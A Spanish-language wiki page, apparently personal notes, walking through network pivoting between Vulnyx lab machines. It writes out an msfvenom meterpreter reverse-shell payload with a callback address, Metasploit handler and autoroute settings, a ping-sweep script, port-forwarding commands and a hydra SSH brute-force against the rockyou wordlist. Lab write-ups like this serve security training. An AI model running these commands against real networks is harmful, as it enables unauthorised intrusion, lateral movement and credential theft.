Notas de Luis

Usaremos la máquina friendly 1 intermedia y la máquina basic de vulnyx máquina final:

Procedemos con la intrusión en la máquina friendly 1 hasta ser usuario root:

Ahora vamos a recibir esta conexión como meterpreter en la máquina atacante, por lo que creamos un nuevo payload con msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT=4444 -f elf -b '\x00\x0a\x0d' -o virus

Y nos lo compartimos con la máquina víctima:

Y usamos el multi/handler de metasploit cargando el payload de meterpreter:

set PAYLOAD linux/x86/meterpreter/reverse_tcp

Y recibimos el meterpreter:

Vemos las interfaces de red con el comando ipconfig, donde identificamos la segunda interfaz de red:

Enrutamos el tráfico con el módulo de autoroute:

use /multi/manage/autoroute

Y ahora tenemos que encontrar equipos levantados dentro de esta red interna de 10.10.10.0/24, por lo que usamos el siguiente script:

#!/bin/bash
 
for i in {1..255}; do
    timeout 1 bash -c "ping -c 1 10.10.10.$i" >/dev/null
    if [ $? -eq 0 ]; then
        echo "El host 10.10.10.$i está activo"
    fi
done

Lo compartimos:

Lo recibimos:

Y encontramos el host objetivo:

Ahora tenemos que hacerle un escaneo de puertos a esta dirección IP, por lo que usamos el módulo de portscan/tcp:

Y con los siguientes comandos realizamos el port forwarding, de tal forma que nos vamos a traer tanto el puerto 22 como el puerto 631:

portfwd add -l 222 -p 22 -r 10.10.10.8
portfwd add -l 631 -p 631 -r 10.10.10.8

Y aquí vemos el contenido de lo que corre por el puerto 631:

Detectamos el usuario:

Por lo que atacamos al puerto ssh que también nos hemos traído en el puerto 222 de mi máquina local:

hydra -l dimitri -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1 -s 222
computing/hacking/pivoting/con_maquina_linux.txt · Última modificación: por 127.0.0.1